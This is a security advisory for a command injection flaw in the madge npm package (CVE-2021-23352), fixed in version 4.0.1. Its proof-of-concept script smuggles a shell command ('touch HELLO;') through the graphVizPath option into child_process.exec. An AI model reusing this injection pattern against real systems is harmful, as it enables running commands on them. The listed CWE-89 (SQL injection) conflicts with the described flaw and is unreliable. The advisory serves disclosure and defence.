Command Injection

Affecting madge package, versions <4.0.1

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

madge is a Madge is a developer tool for generating a visual graph of your module dependencies, finding circular dependencies, and give you other useful info.

Affected versions of this package are vulnerable to Command Injection. It is possible to specify a custom Graphviz path via the graphVizPath option parameter which when the .image(), .svg() or .dot() functions are called, is executed by the childprocess.exec function.

PoC

1. install `madge` module: `npm i madge`
2. run the following poc.js:

// Example taken from: https://github.com/pahen/madge#svg

const madge = require('madge');
madge('..', {graphVizPath: "touch HELLO;"})
.then((res) => res.svg())
.then((writtenImagePath) => {
console.log('Image written to ' + writtenImagePath);
});

Remediation

Upgrade madge to version 4.0.1 or higher.

References

CVSS Score

8.6
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    Low
  • Availability
    Low
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:F/RL:O/RC:C
Credit
Alessio Della Libera (d3lla)
CVE
CVE-2021-23352
CWE
CWE-89
Snyk ID
SNYK-JS-MADGE-1082875
Disclosed
05 Mar, 2021
Published
09 Mar, 2021